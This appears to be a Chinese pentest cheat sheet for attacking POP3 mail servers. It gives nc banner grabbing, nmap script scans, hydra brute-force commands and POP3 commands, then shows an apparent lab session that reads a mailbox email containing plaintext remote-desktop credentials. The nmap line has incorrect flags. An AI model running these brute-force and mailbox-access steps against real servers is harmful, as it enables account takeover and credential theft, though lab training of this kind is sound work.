【渗透技巧】pop3协议渗透
banner信息获取
nc -nv <IP> 110
nmap pop3脚本扫描
nmap --scripts "pop3-capabilities or pop3-ntlm-info" -sV -port <PORT> <IP>
pop3爆破
可以使用hydra或者xhydra。hydra-wizard可以提供命令行向导配置。
hydra -s PORT -l USERNAME -p PASSWORD -e nsr -t 22 IP pop3
- PORT:pop3服务所用端口号
- USERNAME:单个用户名
- PASSWORD:单个密码
- IP:pop3服务器地址
hydra -s PORT -L USERNAME_LIST -P PASSWORD_LIST -e nsr -t 22 IP pop3
- PORT:pop3服务所用端口号
- USERNAME_LIST:用户名文件
- PASSWORD_LIST:密码文件
- IP:pop3服务器地址
pop命令行
POP commands:
USER uid Log in as "uid"
PASS password Substitue "password" for your actual password
STAT List number of messages, total mailbox size
LIST List messages and sizes
RETR n Show message n
DELE n Mark message n for deletion
RSET Undo any changes
QUIT Logout (expunges messages if no RSET)
TOP msg n Show first n lines of message number msg
CAPA Get capabilities
命令行登录pop邮箱
telnet方式
telnet IP PORT
- IP:pop服务所用IP
- PORT:pop服务所用端口号
nc方式
nc IP PORT
- IP:pop服务所用IP
- PORT:pop服务所用端口号
例子
root@kali:~# telnet $ip 110
+OK beta POP3 server (JAMES POP3 Server 2.3.2) ready
USER billydean
+OK
PASS password
+OK Welcome billydean
list
+OK 2 1807
1 786
2 1021
retr 1
+OK Message follows
From: jamesbrown@motown.com
Dear Billy Dean,
Here is your login for remote desktop ... try not to forget it this time!
username: billydean
password: PA$$W0RD!Z